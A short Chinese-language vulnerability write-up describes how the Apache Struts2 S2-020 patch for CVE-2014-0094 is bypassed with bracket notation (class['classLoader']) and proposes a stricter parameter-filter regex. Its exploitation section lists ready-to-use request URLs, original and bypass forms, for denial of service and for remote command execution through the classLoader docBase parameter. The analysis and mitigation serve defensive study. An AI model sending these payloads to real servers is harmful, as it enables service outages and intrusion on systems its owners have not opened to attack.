Struts2 S2-020补丁绕过漏洞

0×00 背景

安全研究人员指出Apache Struts2在漏洞公告S2-020里，在处理修复CVE-2014-0094的漏洞修补方案存在漏洞，导致补丁被完全绕过。

0×01 分析

Struts2 S2-020 中加入 (.*\.|^)class\..* 来过滤action参数。然而最近翰海源报告了一种绕过方法（http://blog.vulnhunt.com/index.php/2014/04/24/apache_struts2_0day/），使用class['classLoader']来代替class.classloader绕过正则表达式，从而完全绕过S2-020的补丁。
翰海源提出较为严格的临时解决方案,替换所有的 ^dojo\..* 改为 (.*\.|^)class.*,^dojo\..*
因此过滤所有class开头和包含.class的action参数。显然这个解决方案不够完美，我觉得替换成

(.*\.|^)class(\.|('|")]|\[).*,^dojo\..*

才好，只过滤class开头且后面为. [ "] '] 形式的参数。

Done!

0x02 利用

DDOS原利用方法：

http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=不存在的路径

绕过方法：

http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=不存在的路径

远程命令执行原利用方法：

http://www.domain.com/index.action?class.classLoader.resources.dirContext.docBase=映射主机共享目录

绕过方法：

http://www.domain.com/index.action?class['classLoader']['resources']['dirContext']['docBase']=映射主机共享目录